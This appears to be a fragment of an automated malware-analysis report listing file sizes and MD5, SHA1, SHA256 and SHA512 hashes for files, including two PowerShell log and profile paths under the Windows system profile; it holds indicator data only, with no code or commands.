MD5a090c26b4be46ffdf226a0b7a453f51f
SHA16a1743d359bef4ee18fdee6a6bf5199e69f07cfb
SHA256bb93f0838f72a557c09e03593360e5458ab7d43921773d3961287a28201289ef
SHA51283c90f4efff01cb84bb97030c84bac212b8b143723c7f1f3ecd3379000be85de3850d211519c2d429ebf4dba8b555c3a9a4c9a77f6ab856630907da681822691
-
Filesize
10.7MB
MD5a090c26b4be46ffdf226a0b7a453f51f
SHA16a1743d359bef4ee18fdee6a6bf5199e69f07cfb
SHA256bb93f0838f72a557c09e03593360e5458ab7d43921773d3961287a28201289ef
SHA51283c90f4efff01cb84bb97030c84bac212b8b143723c7f1f3ecd3379000be85de3850d211519c2d429ebf4dba8b555c3a9a4c9a77f6ab856630907da681822691
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD5cadef9abd087803c630df65264a6c81c
SHA1babbf3636c347c8727c35f3eef2ee643dbcc4bd2
SHA256cce65b73cdfe9304bcd5207913e8b60fb69faa20cd3b684f2b0343b755b99438
SHA5127278aa87124abb382d9024a645e881e7b7cf1b84e8894943b36e018dbf0399e6858392f77980b599fa5488e2e21bf757a0702fe6419417edac93b68e0c2ec085
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD500930b40cba79465b7a38ed0449d1449
SHA14b25a89ee28b20ba162f23772ddaf017669092a5
SHA256eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5